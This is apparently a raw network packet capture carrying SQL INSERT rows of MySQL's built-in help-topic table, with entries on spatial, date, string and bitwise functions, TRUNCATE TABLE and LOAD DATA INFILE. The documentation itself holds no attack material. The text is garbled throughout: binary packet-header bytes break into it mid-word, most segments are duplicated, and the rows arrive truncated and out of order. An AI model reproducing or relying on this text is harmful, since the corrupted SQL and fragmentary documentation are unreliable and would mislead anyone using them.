0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT NumInteriorRings(GeomFromText(@poly));\n+---------------------------------------+\n| NumInteriorRings(GeomFromText(@poly)) |\n+---------------------------------------+\n| 1 |\n+---------------------------------------+',''),(321,'INTERIORRINGN',0,' InteriorRingN(poly,n)\nReturns the n-th interior ring for the Polygon value\npoly as a LineString.\nRing numbers begC bb0`BiET@/Ԁo0SE<*@@  3P켹Bb D )W> \'%d.%m.%Y %H.%i\');\n -> \'2003-10-03 09:20:00\'\nmysql> SELECT STR_TO_DATE(\'10arp\', \'%carp\');\n -> \'0000-10-00 00:00:00\'\nmysql> SELECT STR_TO_DATE(\'2003-15-10 00:00:00\',\n -> \'%Y-%m-%d %H:%i:%s\');\n -> NULL',''),(319,'Y',16,' Y(p)\nReturns the Y-coordinate value for the point p as a double-precision\nnumber.\n','mysql> SELECT Y(GeomFromText(\'Point(56.7 53.34)\'));\n+--------------------------------------+\n| Y(GeomFromText(\'Point(56.7 53.34)\')) |\n+--------------------------------------+\n| 53.34 |\n+--------------------------------------+',''),(320,'NUMINTERIORRINGS',0,' NumInteriorRings(poly)\nReturns the number of interior rings in the Polygon value poly.\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT NumInteriorRings(GeomFromText(@poly));\n+---------------------------------------+\n| NumInteriorRings(GeomFromText(@poly)) |\n+---------------------------------------+\n| 1 |\n+---------------------------------------+',''),(321,'INTERIORRINGN',0,' InteriorRingN(poly,n)\nReturns the n-th interior ring for the Polygon value\npoly as a LineString.\nRing numbers begC& bbBi0`ET@/أ  o0E<@?|  PPZ脀  `Yd?ELETE FROM in the following ways from MySQL 4.0 and up:\n\n --- Truncate operations drop and re-create the table, which is much faster\nthan deleting rows one by one.\n --- Truncate operations are not transaction-safe; you get an error if\nyou have an active transaction or an active table lock.\n --- The number of deleted rows is not returned.\n --- As long as the table definition file *tbl_name.frm is\nvalid, the table can be re-created as an empty table with TRUNCATE\nTABLE, even if the data or index files have become corrupted.\n --- The table handler does not remember the last used AUTO_INCREMENT\nvalue, but starts counting from the beginning. This is true even for\nMyISAM and InnoDB, which normally does not reuse sequence values.\n\nIn MySQL 3.23, TRUNCATE TABLE is mapped to\nCOMMIT; DELETE FROM tbl_name, so it behaves like DELETE.\nSee also : [DELETE, , DELETE].\n\nTRUNCATE TABLE is an Oracle SQL extension.\nThis statement was added in MySQL 3.23.28, although from 3.23.28\nto 3.23.32, the keyword TABLE must be omitted.\n','TRUNCATE TABLE tbl_name',''),(255,'CURRENT_DATE',14,' CURRENT_DATE\n CURRENT_DATE()\n\nCURRENT_DATE and CURRENT_DATE() are synonyms for\nCURDATE().\n','',''),(256,'BIT_XOR',12,' BIT_XOR(expr)\nReturns the bitwise XOR of all bits in expCA bb0`BiET@/o0AE<@@{  PPZ脀  `Yd?ELETE FROM in the following ways from MySQL 4.0 and up:\n\n --- Truncate operations drop and re-create the table, which is much faster\nthan deleting rows one by one.\n --- Truncate operations are not transaction-safe; you get an error if\nyou have an active transaction or an active table lock.\n --- The number of deleted rows is not returned.\n --- As long as the table definition file *tbl_name.frm is\nvalid, the table can be re-created as an empty table with TRUNCATE\nTABLE, even if the data or index files have become corrupted.\n --- The table handler does not remember the last used AUTO_INCREMENT\nvalue, but starts counting from the beginning. This is true even for\nMyISAM and InnoDB, which normally does not reuse sequence values.\n\nIn MySQL 3.23, TRUNCATE TABLE is mapped to\nCOMMIT; DELETE FROM tbl_name, so it behaves like DELETE.\nSee also : [DELETE, , DELETE].\n\nTRUNCATE TABLE is an Oracle SQL extension.\nThis statement was added in MySQL 3.23.28, although from 3.23.28\nto 3.23.32, the keyword TABLE must be omitted.\n','TRUNCATE TABLE tbl_name',''),(255,'CURRENT_DATE',14,' CURRENT_DATE\n CURRENT_DATE()\n\nCURRENT_DATE and CURRENT_DATE() are synonyms for\nCURDATE().\n','',''),(256,'BIT_XOR',12,' BIT_XOR(expr)\nReturns the bitwise XOR of all bits in expC bbBi0`ET@/p܂Ao0E<*@?  3P켾Jb & )Xin at 1.\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT AsText(InteriorRingN(GeomFromText(@poly),1));\n+----------------------------------------------+\n| AsText(InteriorRingN(GeomFromText(@poly),1)) |\n+----------------------------------------------+\n| LINESTRING(1 1,1 2,2 2,2 1,1 1) |\n+----------------------------------------------+',''),(322,'UTC_TIME',14,' UTC_TIME\n UTC_TIME()\nReturns the current UTC time as a value in \'HH:MM:SS\' or HHMMSS\nformat, depending on whether the function is used in a string or numeric\ncontext.\n','mysql> SELECT UTC_TIME(), UTC_TIME() + 0;\n -> \'18:07:53\', 180753',''),(323,'STDDEV',12,' STD(expr)\n STDDEV(expr)\nReturns the population standard deviation of expr. This is an\nextension to standard SQL. The STDDEV() form of this function is\nprovided for Oracle compatibility. As of MySQL 5.0.3, the standard SQL\nfunction STDDEV_POP() can be used instead.\n','',''),(324,'PERIOD_ADD',14,' PERIOD_ADD(P,N)\nAdds N months to period P (in the format YYMM or\nYYYYMM). Returns a value in the format YYYYMM.\nNote that the period argument P is /not/ a date value.\n','mysql> SELECT PERIOD_ADD(9801,2);\n -> 199803',''),(325,'|',27,' |\nBitwise OR:\C bb0`BiET@/Ԁo0SE<*@@  3P켾Jb & )Xin at 1.\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT AsText(InteriorRingN(GeomFromText(@poly),1));\n+----------------------------------------------+\n| AsText(InteriorRingN(GeomFromText(@poly),1)) |\n+----------------------------------------------+\n| LINESTRING(1 1,1 2,2 2,2 1,1 1) |\n+----------------------------------------------+',''),(322,'UTC_TIME',14,' UTC_TIME\n UTC_TIME()\nReturns the current UTC time as a value in \'HH:MM:SS\' or HHMMSS\nformat, depending on whether the function is used in a string or numeric\ncontext.\n','mysql> SELECT UTC_TIME(), UTC_TIME() + 0;\n -> \'18:07:53\', 180753',''),(323,'STDDEV',12,' STD(expr)\n STDDEV(expr)\nReturns the population standard deviation of expr. This is an\nextension to standard SQL. The STDDEV() form of this function is\nprovided for Oracle compatibility. As of MySQL 5.0.3, the standard SQL\nfunction STDDEV_POP() can be used instead.\n','',''),(324,'PERIOD_ADD',14,' PERIOD_ADD(P,N)\nAdds N months to period P (in the format YYMM or\nYYYYMM). Returns a value in the format YYYYMM.\nNote that the period argument P is /not/ a date value.\n','mysql> SELECT PERIOD_ADD(9801,2);\n -> 199803',''),(325,'|',27,' |\nBitwise OR:\Cy bbBi0`ET@/p܂Ao0E<*@?  3PRb C )Xn','mysql> SELECT 29 | 15;\n -> 31',''),(326,'GEOMFROMTEXT',3,' GeomFromText(wkt[,srid])\n GeometryFromText(wkt[,srid])\nConstructs a geometry value of any type using its WKT representation and SRID.\n','',''),(327,'RIGHT',23,' RIGHT(str,len)\nReturns the rightmost len characters from the string str.\n','mysql> SELECT RIGHT(\'foobarbar\', 4);\n -> \'rbar\'',''),(328,'DATEDIFF',14,' DATEDIFF(expr,expr2)\n\n\nDATEDIFF() returns the number of days between the start date\nexpr and the end date expr2.\nexpr and expr2 are date or date-and-time expressions.\nOnly the date parts of the values are used in the calculation.\n','mysql> SELECT DATEDIFF(\'1997-12-31 23:59:59\',\'1997-12-30\');\n -> 1\nmysql> SELECT DATEDIFF(\'1997-11-30 23:59:59\',\'1997-12-31\');\n -> -31',''),(329,'BIN',23,' BIN(N)\nReturns a string representation of the binary value of N, where\nN is a longlong (BIGINT) number. This is equivalent to\nCONV(N,10,2). Returns NULL if N is NULL.\n','mysql> SELECT BIN(12);\n -> \'1100\'',''),(330,'MULTILINESTRING',2,' MultiLineString(ls1,ls2,...)\nConstructs a WKB MultiLineString value using WKB LineString\narguments. If any argument is not a WKB LineString, the return\nvalue is NULL.\n','',''),(331,'LOAD DATA',6,'The C ZZBi0`EL@/܂Sŀo0E4@? 3 PsK"ld )lKC ZZBi0`EL@/< o0E4!@??  PG]рn' =eC bb0`BiET@/Ԁo0SE<*@@  3PRb C )Xn','mysql> SELECT 29 | 15;\n -> 31',''),(326,'GEOMFROMTEXT',3,' GeomFromText(wkt[,srid])\n GeometryFromText(wkt[,srid])\nConstructs a geometry value of any type using its WKT representation and SRID.\n','',''),(327,'RIGHT',23,' RIGHT(str,len)\nReturns the rightmost len characters from the string str.\n','mysql> SELECT RIGHT(\'foobarbar\', 4);\n -> \'rbar\'',''),(328,'DATEDIFF',14,' DATEDIFF(expr,expr2)\n\n\nDATEDIFF() returns the number of days between the start date\nexpr and the end date expr2.\nexpr and expr2 are date or date-and-time expressions.\nOnly the date parts of the values are used in the calculation.\n','mysql> SELECT DATEDIFF(\'1997-12-31 23:59:59\',\'1997-12-30\');\n -> 1\nmysql> SELECT DATEDIFF(\'1997-11-30 23:59:59\',\'1997-12-31\');\n -> -31',''),(329,'BIN',23,' BIN(N)\nReturns a string representation of the binary value of N, where\nN is a longlong (BIGINT) number. This is equivalent to\nCONV(N,10,2). Returns NULL if N is NULL.\n','mysql> SELECT BIN(12);\n -> \'1100\'',''),(330,'MULTILINESTRING',2,' MultiLineString(ls1,ls2,...)\nConstructs a WKB MultiLineString value using WKB LineString\narguments. If any argument is not a WKB LineString, the return\nvalue is NULL.\n','',''),(331,'LOAD DATA',6,'The C ZZ0`BiEL@/go0AE4@@ 3 PsK"ld )lKC ZZ0`BiEL@/g܀o0IE4!@@>  PG]рn' =eCs bbBi0`ET@/˃2o0E SELECT TIMEDIFF(\'2000:01:01 00:00:00\',\n -> \'2000:01:01 00:00:00.000001\');\n -> \'-00:00:00.000001\'\nmysql> SELECT TIMEDIFF(\'1997-12-31 23:59:59.000001\',\n -> \'1997-12-30 01:01:01.000002\');\n -> \'46:58:57.999999\'',''),(39,'RELATED',11,' Related(g1,g2,pattern_matrix)\nReturns 1 or 0 to indicate whether or not the spatial relationship specified\nby pattern_matrix exists between g1 and g2.\nReturns -1 if the arguments are NULL.\nThe pattern matrix is a string. Its specification will be noted here if this\nfunction is implemented.\n','',''),(40,'LINEFROMTEXT',3,' LineFromText(wkt[,srid])\n LineStringFromText(wkt[,srid])\nConstructs a LINESTRING value using its WKT representation and SRID.\n','',''),(41,'SHOW MASTER STATUS',6,'SHOW MASTER STATUS\n\nProvides status information on the binary log files of the master.\n','',''),(42,'ADDTIME',14,' ADDTIME(expr,expr2)\n\n\nADDTIME() adds expr2 to expr and returns the result.\nexpr is a time or datetime expression, and expr2 C} ZZBi0`EL@/< o0E4#@??  PG]n =eC bb0`BiET@/o0AE SELECT TIMEDIFF(\'2000:01:01 00:00:00\',\n -> \'2000:01:01 00:00:00.000001\');\n -> \'-00:00:00.000001\'\nmysql> SELECT TIMEDIFF(\'1997-12-31 23:59:59.000001\',\n -> \'1997-12-30 01:01:01.000002\');\n -> \'46:58:57.999999\'',''),(39,'RELATED',11,' Related(g1,g2,pattern_matrix)\nReturns 1 or 0 to indicate whether or not the spatial relationship specified\nby pattern_matrix exists between g1 and g2.\nReturns -1 if the arguments are NULL.\nThe pattern matrix is a string. Its specification will be noted here if this\nfunction is implemented.\n','',''),(40,'LINEFROMTEXT',3,' LineFromText(wkt[,srid])\n LineStringFromText(wkt[,srid])\nConstructs a LINESTRING value using its WKT representation and SRID.\n','',''),(41,'SHOW MASTER STATUS',6,'SHOW MASTER STATUS\n\nProvides status information on the binary log files of the master.\n','',''),(42,'ADDTIME',14,' ADDTIME(expr,expr2)\n\n\nADDTIME() adds expr2 to expr and returns the result.\nexpr is a time or datetime expression, and expr2 C ZZ0`BiEL@/g܀o0IE4#@@>  PG]n =eC bbBi0`ET@/p܂Ao0E<*@?  3PZb  )XLOAD DATA INFILE statement reads rows from a text file into a\ntable at a very high speed.\nFor more information about the efficiency of INSERT versus\nLOAD DATA INFILE and speeding up LOAD DATA INFILE,\n[Insert speed].\n\nAs of MySQL 4.1, the character set indicated by the\ncharacter_set_database system variable is used to interpret the\ninformation in the file. SET NAMES and the setting of\ncharacter_set_client do not affect input interpretation.\n\nYou can also load data files by using the mysqlimport utility; it\noperates by sending a LOAD DATA INFILE statement to the server. The\n--local option causes mysqlimport to read data files from the\nclient host. You can specify the --compress option to get better\nperformance over slow networks if the client and server support the\ncompressed protocol.\nSee also : [mysqlimport, , mysqlimport].\n\nIf you specify the LOW_PRIORITY keyword, execution of the\nLOAD DATA statement is delayed until no other clients are reading\nfrom the table.\n\nIf you specify the CONCURRENT keyword with a MyISAM table that\nsatisfies the condition for concurrent inserts (that is, it contains no free\nblocks in the middle),\nthen other threads can retrieve data from the table while LOAD DATA\nis executing. Using this option affects the perfC bb0`BiET@/Ԁo0SE<*@@  3PZb  )XLOAD DATA INFILE statement reads rows from a text file into a\ntable at a very high speed.\nFor more information about the efficiency of INSERT versus\nLOAD DATA INFILE and speeding up LOAD DATA INFILE,\n[Insert speed].\n\nAs of MySQL 4.1, the character set indicated by the\ncharacter_set_database system variable is used to interpret the\ninformation in the file. SET NAMES and the setting of\ncharacter_set_client do not affect input interpretation.\n\nYou can also load data files by using the mysqlimport utility; it\noperates by sending a LOAD DATA INFILE statement to the server. The\n--local option causes mysqlimport to read data files from the\nclient host. You can specify the --compress option to get better\nperformance over slow networks if the client and server support the\ncompressed protocol.\nSee also : [mysqlimport, , mysqlimport].\n\nIf you specify the LOW_PRIORITY keyword, execution of the\nLOAD DATA statement is delayed until no other clients are reading\nfrom the table.\n\nIf you specify the CONCURRENT keyword with a MyISAM table that\nsatisfies the condition for concurrent inserts (that is, it contains no free\nblocks in the middle),\nthen other threads can retrieve data from the table while LOAD DATA\nis executing. Using this option affects the perfC` bbBi0`ET@/˃2o0E SELECT ADDTIME(\'1997-12-31 23:59:59.999999\',\n -> \'1 1:1:1.000002\');\n -> \'1998-01-02 01:01:01.000001\'\nmysql> SELECT ADDTIME(\'01:00:00.999999\', \'02:00:00.999998\');\n -> \'03:00:01.999997\'',''),(43,'SPATIAL',24,'MySQL can create spatial indexes using syntax similar to that for creating\nregular indexes, but extended with the SPATIAL keyword.\nSpatial columns that are indexed currently must be declared NOT NULL.\nThe following examples demonstrate how to create spatial indexes.\n\n\n With CREATE TABLE:\n\nmysql> CREATE TABLE geom (g GEOMETRY NOT NULL, SPATIAL INDEX(g));\n\n With ALTER TABLE:\n\nmysql> ALTER TABLE geom ADD SPATIAL INDEX(g);\n\n With CREATE INDEX:\n\nmysql> CREATE SPATIAL INDEX sp_index ON geom (g);\n\n\nTo drop spatial indexes, use ALTER TABLE or DROP INDEX:\n\n\n With ALTER TABLE:\n\nmysql> ALTER TABLE geom DROP INDEX g;\n\n With DROP INDEX:\n\nmysql> DROP INDEX sp_index ON geom;\n\n\nExample: Suppose that a table geom contains more than 32,000 geometries,\nwhich are stored in the column g of type GEOMETRY.\nThe table also has an AUTO_INCREMENT column fid for storing\nobject ID values.\n','',''),(44,'TIMESTAMPDIFF',14,' TIMESTAMPDIFF(interval,datetime_expr1,datetimCg ZZBi0`EL@/܂Sŀo0E4SX@?' 3 PtW'tQ )lSCy bb0`BiET@/o0AE SELECT ADDTIME(\'1997-12-31 23:59:59.999999\',\n -> \'1 1:1:1.000002\');\n -> \'1998-01-02 01:01:01.000001\'\nmysql> SELECT ADDTIME(\'01:00:00.999999\', \'02:00:00.999998\');\n -> \'03:00:01.999997\'',''),(43,'SPATIAL',24,'MySQL can create spatial indexes using syntax similar to that for creating\nregular indexes, but extended with the SPATIAL keyword.\nSpatial columns that are indexed currently must be declared NOT NULL.\nThe following examples demonstrate how to create spatial indexes.\n\n\n With CREATE TABLE:\n\nmysql> CREATE TABLE geom (g GEOMETRY NOT NULL, SPATIAL INDEX(g));\n\n With ALTER TABLE:\n\nmysql> ALTER TABLE geom ADD SPATIAL INDEX(g);\n\n With CREATE INDEX:\n\nmysql> CREATE SPATIAL INDEX sp_index ON geom (g);\n\n\nTo drop spatial indexes, use ALTER TABLE or DROP INDEX:\n\n\n With ALTER TABLE:\n\nmysql> ALTER TABLE geom DROP INDEX g;\n\n With DROP INDEX:\n\nmysql> DROP INDEX sp_index ON geom;\n\n\nExample: Suppose that a table geom contains more than 32,000 geometries,\nwhich are stored in the column g of type GEOMETRY.\nThe table also has an AUTO_INCREMENT column fid for storing\nobject ID values.\n','',''),(44,'TIMESTAMPDIFF',14,' TIMESTAMPDIFF(interval,datetime_expr1,datetimC ZZ0`BiEL@/go0AE4SX@@' 3 PtW'tQ )lSC bbBi0`ET@/p܂Ao0E<*@?  3Pbb  )Xormance of LOAD DATA\na bit, even if no other thread is using the table at the same time.\n\nIf the LOCAL keyword is specified, it is\ninterpreted with respect to the client end of the connection:\n\n\n --- If LOCAL is specified, the file is read by the client program on the\nclient host and sent to the server. The file can be given as a full pathname\nto specify its exact location. If given as a relative pathname, the name is\ninterpreted relative to the directory in which the client program was started.\n\n --- If LOCAL is not specified, the\nfile must be located on the server host and is read directly by the server.\n\n\nLOCAL is available in MySQL 3.22.6 or later.\n\nWhen locating files on the server host, the server uses the following rules:\n\n --- If an absolute pathname is given, the server uses the pathname as is.\n\n --- If a relative pathname with one or more leading components is given,\nthe server searches for the file relative to the server\'s data directory.\n\n --- If a filename with no leading components is given, the server looks for\nthe file in the database directory of the default database.\n\nNote that these rules mean that a file named as *./myfile.txt is read from\nthe server\'s data directory, whereas the same file named as *myfile.txt is\nreaC bb0`BiET@/Ԁo0SE<*@@  3Pbb  )Xormance of LOAD DATA\na bit, even if no other thread is using the table at the same time.\n\nIf the LOCAL keyword is specified, it is\ninterpreted with respect to the client end of the connection:\n\n\n --- If LOCAL is specified, the file is read by the client program on the\nclient host and sent to the server. The file can be given as a full pathname\nto specify its exact location. If given as a relative pathname, the name is\ninterpreted relative to the directory in which the client program was started.\n\n --- If LOCAL is not specified, the\nfile must be located on the server host and is read directly by the server.\n\n\nLOCAL is available in MySQL 3.22.6 or later.\n\nWhen locating files on the server host, the server uses the following rules:\n\n --- If an absolute pathname is given, the server uses the pathname as is.\n\n --- If a relative pathname with one or more leading components is given,\nthe server searches for the file relative to the server\'s data directory.\n\n --- If a filename with no leading components is given, the server looks for\nthe file in the database directory of the default database.\n\nNote that these rules mean that a file named as *./myfile.txt is read from\nthe server\'s data directory, whereas the same file named as *myfile.txt is\nreaC bbBi0`ET@/˃2o0E SELECT UPPER(\'Hej\');\n -> \'HEJ\'',''),(46,'FROM_UNIXTIME',14,' FROM_UNIXTIME(unix_timestamp)\n FROM_UNIXTIME(unix_timestamp,format)\nReturns a representation of the unix_timestamp argument as a value in\n\'YYYY-MM-DD HH:MM:SS\' or YYYYMMDDHHMMSS format, depending on\nwhether the function is used in a string or numeric context.\n\nmysql> SELECT FROM_UNIXTIME(875996580);\n -> \'1997-10-04 22:23:00\'\nmysql> SELECT FROM_UNIXTIME(875996580) + 0;\n -> 19971004222300\n\nIf format is given, the result is formatted according to the\nformat string. format may contain the same specifiers as\nthose listed in the entry for the DATE_FORMAT() function.\n','mysql> SELECT FROM_UNIXTIME(UNIX_TIMESTAMP(),\n -> \'%Y %D %M %h:%i:%s %x\');\n -> \'C bb0`BiET@/o0AE SELECT UPPER(\'Hej\');\n -> \'HEJ\'',''),(46,'FROM_UNIXTIME',14,' FROM_UNIXTIME(unix_timestamp)\n FROM_UNIXTIME(unix_timestamp,format)\nReturns a representation of the unix_timestamp argument as a value in\n\'YYYY-MM-DD HH:MM:SS\' or YYYYMMDDHHMMSS format, depending on\nwhether the function is used in a string or numeric context.\n\nmysql> SELECT FROM_UNIXTIME(875996580);\n -> \'1997-10-04 22:23:00\'\nmysql> SELECT FROM_UNIXTIME(875996580) + 0;\n -> 19971004222300\n\nIf format is given, the result is formatted according to the\nformat string. format may contain the same specifiers as\nthose listed in the entry for the DATE_FORMAT() function.\n','mysql> SELECT FROM_UNIXTIME(UNIX_TIMESTAMP(),\n -> \'%Y %D %M %h:%i:%s %x\');\n -> \'C bbBi0`ET@/p܂Ao0E<*@?  3Pjb Zl )Yd from the database directory of the default database. For example,\nthe following LOAD DATA statement reads the file *data.txt\nfrom the database directory for db1 because db1 is the current\ndatabase, even though the statement explicitly loads the file into a\ntable in the db2 database:\n\nmysql> USE db1;\nmysql> LOAD DATA INFILE \'data.txt\' INTO TABLE db2.my_table;\n\nNote that Windows pathnames are specified using forward slashes rather than\nbackslashes. If you do use backslashes, you must double them.\n\nFor security reasons, when reading text files located on the server, the\nfiles must either reside in the database directory or be readable by all.\nAlso, to use LOAD DATA INFILE on server files, you must have the\nFILE privilege.\n','LOAD DATA [LOW_PRIORITY | CONCURRENT] [LOCAL] INFILE \'file_name.txt\'\n [REPLACE | IGNORE]\n INTO TABLE tbl_name\n [FIELDS\n [TERMINATED BY \'\\t\']\n [[OPTIONALLY] ENCLOSED BY \'\']\n [ESCAPED BY \'\\\\\' ]\n ]\n [LINES\n [STARTING BY \'\']\n [TERMINATED BY \'\\n\']\n ]\n [IGNORE number LINES]\n [(col_name,...)]',''),(332,'BLOB TYPE',1,' BLOB[(M)]\n\nA BLOB column with a maximum length of 65,535\n(2^16 - 1) bytes.\n\nBeginning with MySQL 4.1, an optional length M canC ZZBi0`EL@/< o0E4%@??  PG]n =eC bb0`BiET@/Ԁo0SE<*@@  3Pjb Zl )Yd from the database directory of the default database. For example,\nthe following LOAD DATA statement reads the file *data.txt\nfrom the database directory for db1 because db1 is the current\ndatabase, even though the statement explicitly loads the file into a\ntable in the db2 database:\n\nmysql> USE db1;\nmysql> LOAD DATA INFILE \'data.txt\' INTO TABLE db2.my_table;\n\nNote that Windows pathnames are specified using forward slashes rather than\nbackslashes. If you do use backslashes, you must double them.\n\nFor security reasons, when reading text files located on the server, the\nfiles must either reside in the database directory or be readable by all.\nAlso, to use LOAD DATA INFILE on server files, you must have the\nFILE privilege.\n','LOAD DATA [LOW_PRIORITY | CONCURRENT] [LOCAL] INFILE \'file_name.txt\'\n [REPLACE | IGNORE]\n INTO TABLE tbl_name\n [FIELDS\n [TERMINATED BY \'\\t\']\n [[OPTIONALLY] ENCLOSED BY \'\']\n [ESCAPED BY \'\\\\\' ]\n ]\n [LINES\n [STARTING BY \'\']\n [TERMINATED BY \'\\n\']\n ]\n [IGNORE number LINES]\n [(col_name,...)]',''),(332,'BLOB TYPE',1,' BLOB[(M)]\n\nA BLOB column with a maximum length of 65,535\n(2^16 - 1) bytes.\n\nBeginning with MySQL 4.1, an optional length M canC ZZ0`BiEL@/g܀o0IE4%@@>  PG]n =eC# bbBi0`ET@/أ  o0E<@?  PgZ*a8 ^ `]}s. It is required that N1 < N2 < N3 <\n... < Nn for this function to work correctly. This is because\na binary search is used (very fast).\n','mysql> SELECT INTERVAL(23, 1, 15, 17, 30, 44, 200);\n -> 3\nmysql> SELECT INTERVAL(10, 1, 10, 100, 1000);\n -> 2\nmysql> SELECT INTERVAL(22, 23, 30, 44, 200);\n -> 0',''),(345,'FROM_DAYS',14,' FROM_DAYS(N)\nGiven a daynumber N, returns a DATE value.\n','mysql> SELECT FROM_DAYS(729669);\n -> \'1997-10-07\'',''),(346,'BIT_COUNT',27,' BIT_COUNT(N)\nReturns the number of bits that are set in the argument N.\n','mysql> SELECT BIT_COUNT(29);\n -> 4',''),(347,'UTC_TIMESTAMP',14,' UTC_TIMESTAMP\n UTC_TIMESTAMP()\nReturns the current UTC date and time as a value in \'YYYY-MM-DD HH:MM:SS\'\nor YYYYMMDDHHMMSS format, depending on whether the function is used in\na string or numeric context.\n','mysql> SELECT UTC_TIMESTAMP(), UTC_TIMESTAMP() + 0;\n -> \'2003-08-14 18:08:04\', 20030814180804',''),(348,'+',4,' +\nAddition:\n','mysql> SELECT 3+5;\n -> 8',''),(349,'INET_NTOA',21,' INET_NTOA(expr)\nGiven a numeric network address (4 or 8 byte), returns the dotted-quad\nrepresentation of the address as a string.\n','mysql> SELECT INET_NTOA(3520061480);\n -> \'209.207.224.40\'',C# bb0`BiET@/4o0 E<@@  PgZ*a8 ^ `]}s. It is required that N1 < N2 < N3 <\n... < Nn for this function to work correctly. This is because\na binary search is used (very fast).\n','mysql> SELECT INTERVAL(23, 1, 15, 17, 30, 44, 200);\n -> 3\nmysql> SELECT INTERVAL(10, 1, 10, 100, 1000);\n -> 2\nmysql> SELECT INTERVAL(22, 23, 30, 44, 200);\n -> 0',''),(345,'FROM_DAYS',14,' FROM_DAYS(N)\nGiven a daynumber N, returns a DATE value.\n','mysql> SELECT FROM_DAYS(729669);\n -> \'1997-10-07\'',''),(346,'BIT_COUNT',27,' BIT_COUNT(N)\nReturns the number of bits that are set in the argument N.\n','mysql> SELECT BIT_COUNT(29);\n -> 4',''),(347,'UTC_TIMESTAMP',14,' UTC_TIMESTAMP\n UTC_TIMESTAMP()\nReturns the current UTC date and time as a value in \'YYYY-MM-DD HH:MM:SS\'\nor YYYYMMDDHHMMSS format, depending on whether the function is used in\na string or numeric context.\n','mysql> SELECT UTC_TIMESTAMP(), UTC_TIMESTAMP() + 0;\n -> \'2003-08-14 18:08:04\', 20030814180804',''),(348,'+',4,' +\nAddition:\n','mysql> SELECT 3+5;\n -> 8',''),(349,'INET_NTOA',21,' INET_NTOA(expr)\nGiven a numeric network address (4 or 8 byte), returns the dotted-quad\nrepresentation of the address as a string.\n','mysql> SELECT INET_NTOA(3520061480);\n -> \'209.207.224.40\'',C"$ bbBi0`ET@/˃2o0E SELECT IFNULL(1,0);\n -> 1\nmysql> SELECT IFNULL(NULL,10);\n -> 10\nmysql> SELECT IFNULL(1/0,10);\n -> 10\nmysql> SELECT IFNULL(1/0,\'yes\');\n -> \'yes\'',''),(49,'LEAST',26,' LEAST(value1,value2,...)\nWith two or more arguments, returns the smallest (minimum-valued) argument.\nThe arguments are compared 1000 using the following rules.\n\n --- If the return value is used in an INTEGER context or all arguments\nare integer-valued, they are compared as integers.\n\n --- If the return value is used in a REAL context or all arguments are\nreal-valued, they are compared as reals.\n\n --- If any argument is a case-sensitive string, the arguments are compared\nas case-sensitive strings.\n\n --- In other cases, the arguments are compared as case-insensitive strings.\n','mysql> SELECT LEAST(2,0);\n -> 0\nmysql> SELECT LEAST(34.0,3.0,5.0,767.0);\n -> 3.0\nmysql> SELECT LEC)$ ZZBi0`EL@/9do0E4h@?  P _@+G/"W H:o:C:$ bb0`BiET@/o0AE SELECT IFNULL(1,0);\n -> 1\nmysql> SELECT IFNULL(NULL,10);\n -> 10\nmysql> SELECT IFNULL(1/0,10);\n -> 10\nmysql> SELECT IFNULL(1/0,\'yes\');\n -> \'yes\'',''),(49,'LEAST',26,' LEAST(value1,value2,...)\nWith two or more arguments, returns the smallest (minimum-valued) argument.\nThe arguments are compared 1000 using the following rules.\n\n --- If the return value is used in an INTEGER context or all arguments\nare integer-valued, they are compared as integers.\n\n --- If the return value is used in a REAL context or all arguments are\nreal-valued, they are compared as reals.\n\n --- If any argument is a case-sensitive string, the arguments are compared\nas case-sensitive strings.\n\n --- In other cases, the arguments are compared as case-insensitive strings.\n','mysql> SELECT LEAST(2,0);\n -> 0\nmysql> SELECT LEAST(34.0,3.0,5.0,767.0);\n -> 3.0\nmysql> SELECT LECF$ ZZ0`BiEL@/>o0xE4h@@  P _@+G/"W H:o:C% bbBi0`ET@/p܂Ao0E<*@?  3Prb J2 )Y be given.\nMySQL will create the column as the smallest BLOB type largest\nenough to hold values M bytes long.\n','',''),(333,'LOCALTIME',14,' LOCALTIME\n LOCALTIME()\n\nLOCALTIME and LOCALTIME() are synonyms for\nNOW().\n','',''),(334,'MPOINTFROMTEXT',3,' MPointFromText(wkt[,srid])\n MultiPointFromText(wkt[,srid])\nConstructs a MULTIPOINT value using its WKT representation and SRID.\n','',''),(335,'BLOB',1,'A BLOB is a binary large object that can hold a variable amount of\ndata. The four BLOB types, TINYBLOB, BLOB,\nMEDIUMBLOB, and LONGBLOB, differ only in the maximum length of\nthe values they can hold.\n','',''),(336,'PASSWORD',17,'','mysql> SELECT PASSWORD(\'badpwd\');\n -> \'7f84554057dd964b\'',''),(337,'CHAR',1,' [NATIONAL] CHAR(M) [BINARY | ASCII | UNICODE]\n\nA fixed-length string that is always right-padded with spaces to the\nspecified length when stored. M represents the column length. The\nrange of M is 0 to 255 characters (1 to 255 prior to MySQL 3.23).\n\nNote: Trailing spaces are removed when CHAR values are\nretrieved.\n\nFrom MySQL 4.1.0 to 5.0.2, a CHAR column with a length specification\ngreater than 255 is converted to the smallest TEXT type that can hold\nvalues of the given length. For example, CHAR(500) is converted to\nTEC.% bb0`BiET@/Ԁo0SE<*@@  3Prb J2 )Y be given.\nMySQL will create the column as the smallest BLOB type largest\nenough to hold values M bytes long.\n','',''),(333,'LOCALTIME',14,' LOCALTIME\n LOCALTIME()\n\nLOCALTIME and LOCALTIME() are synonyms for\nNOW().\n','',''),(334,'MPOINTFROMTEXT',3,' MPointFromText(wkt[,srid])\n MultiPointFromText(wkt[,srid])\nConstructs a MULTIPOINT value using its WKT representation and SRID.\n','',''),(335,'BLOB',1,'A BLOB is a binary large object that can hold a variable amount of\ndata. The four BLOB types, TINYBLOB, BLOB,\nMEDIUMBLOB, and LONGBLOB, differ only in the maximum length of\nthe values they can hold.\n','',''),(336,'PASSWORD',17,'','mysql> SELECT PASSWORD(\'badpwd\');\n -> \'7f84554057dd964b\'',''),(337,'CHAR',1,' [NATIONAL] CHAR(M) [BINARY | ASCII | UNICODE]\n\nA fixed-length string that is always right-padded with spaces to the\nspecified length when stored. M represents the column length. The\nrange of M is 0 to 255 characters (1 to 255 prior to MySQL 3.23).\n\nNote: Trailing spaces are removed when CHAR values are\nretrieved.\n\nFrom MySQL 4.1.0 to 5.0.2, a CHAR column with a length 